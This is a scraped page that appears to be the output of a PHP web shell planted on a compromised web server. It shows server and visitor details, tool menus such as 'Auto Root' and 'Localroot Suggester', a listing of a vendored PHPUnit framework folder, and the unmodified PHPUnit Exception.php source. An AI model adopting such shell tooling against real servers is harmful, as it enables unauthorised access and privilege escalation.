Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.145.158.137
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
3 /
phpunit /
phpunit /
src /
Framework /
Delete
Unzip
Name
Size
Permission
Date
Action
Assert
[ DIR ]
drwxr-xr-x
2018-12-03 09:00
Constraint
[ DIR ]
drwxr-xr-x
2018-12-03 09:00
Error
[ DIR ]
drwxr-xr-x
2018-12-03 09:00
MockObject
[ DIR ]
drwxr-xr-x
2018-12-03 09:00
Assert.php
75.44
KB
-rw-r--r--
2018-12-03 09:00
AssertionFailedError.php
540
B
-rw-r--r--
2018-12-03 09:00
CodeCoverageException.php
308
B
-rw-r--r--
2018-12-03 09:00
CoveredCodeNotExecutedException.php
323
B
-rw-r--r--
2018-12-03 09:00
DataProviderTestSuite.php
854
B
-rw-r--r--
2018-12-03 09:00
Exception.php
2.26
KB
-rw-r--r--
2018-12-03 09:00
ExceptionWrapper.php
2.99
KB
-rw-r--r--
2018-12-03 09:00
ExpectationFailedException.php
1.04
KB
-rw-r--r--
2018-12-03 09:00
IncompleteTest.php
437
B
-rw-r--r--
2018-12-03 09:00
IncompleteTestCase.php
1.43
KB
-rw-r--r--
2018-12-03 09:00
IncompleteTestError.php
343
B
-rw-r--r--
2018-12-03 09:00
InvalidCoversTargetException.php
327
B
-rw-r--r--
2018-12-03 09:00
MissingCoversAnnotationException.php
324
B
-rw-r--r--
2018-12-03 09:00
OutputError.php
309
B
-rw-r--r--
2018-12-03 09:00
RiskyTest.php
282
B
-rw-r--r--
2018-12-03 09:00
RiskyTestError.php
333
B
-rw-r--r--
2018-12-03 09:00
SelfDescribing.php
471
B
-rw-r--r--
2018-12-03 09:00
SkippedTest.php
284
B
-rw-r--r--
2018-12-03 09:00
SkippedTestCase.php
1.42
KB
-rw-r--r--
2018-12-03 09:00
SkippedTestError.php
337
B
-rw-r--r--
2018-12-03 09:00
SkippedTestSuiteError.php
342
B
-rw-r--r--
2018-12-03 09:00
SyntheticError.php
1.22
KB
-rw-r--r--
2018-12-03 09:00
Test.php
514
B
-rw-r--r--
2018-12-03 09:00
TestCase.php
62.28
KB
-rw-r--r--
2018-12-03 09:00
TestFailure.php
3.43
KB
-rw-r--r--
2018-12-03 09:00
TestListener.php
1.42
KB
-rw-r--r--
2018-12-03 09:00
TestListenerDefaultImplementation.php
1.11
KB
-rw-r--r--
2018-12-03 09:00
TestResult.php
28.51
KB
-rw-r--r--
2018-12-03 09:00
TestSuite.php
25.97
KB
-rw-r--r--
2018-12-03 09:00
TestSuiteIterator.php
1.74
KB
-rw-r--r--
2018-12-03 09:00
UnintentionallyCoveredCodeError.php
458
B
-rw-r--r--
2018-12-03 09:00
Warning.php
526
B
-rw-r--r--
2018-12-03 09:00
WarningTestCase.php
1.22
KB
-rw-r--r--
2018-12-03 09:00
Save
Rename
<?php /* * This file is part of PHPUnit. * * (c) Sebastian Bergmann <sebastian@phpunit.de> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace PHPUnit\Framework; use PHPUnit\Util\Filter; /** * Base class for all PHPUnit Framework exceptions. * * Ensures that exceptions thrown during a test run do not leave stray * references behind. * * Every Exception contains a stack trace. Each stack frame contains the 'args' * of the called function. The function arguments can contain references to * instantiated objects. The references prevent the objects from being * destructed (until test results are eventually printed), so memory cannot be * freed up. * * With enabled process isolation, test results are serialized in the child * process and unserialized in the parent process. The stack trace of Exceptions * may contain objects that cannot be serialized or unserialized (e.g., PDO * connections). Unserializing user-space objects from the child process into * the parent would break the intended encapsulation of process isolation. * * @see http://fabien.potencier.org/article/9/php-serialization-stack-traces-and-exceptions */ class Exception extends \RuntimeException implements \PHPUnit\Exception { /** * @var array */ protected $serializableTrace; public function __construct($message = '', $code = 0, \Exception $previous = null) { parent::__construct($message, $code, $previous); $this->serializableTrace = $this->getTrace(); foreach ($this->serializableTrace as $i => $call) { unset($this->serializableTrace[$i]['args']); } } /** * @throws \InvalidArgumentException */ public function __toString(): string { $string = TestFailure::exceptionToString($this); if ($trace = Filter::getFilteredStacktrace($this)) { $string .= "\n" . $trace; } return $string; } public function __sleep(): array { return \array_keys(\get_object_vars($this)); } /** * Returns the serializable trace (without 'args'). */ public function getSerializableTrace(): array { return $this->serializableTrace; } }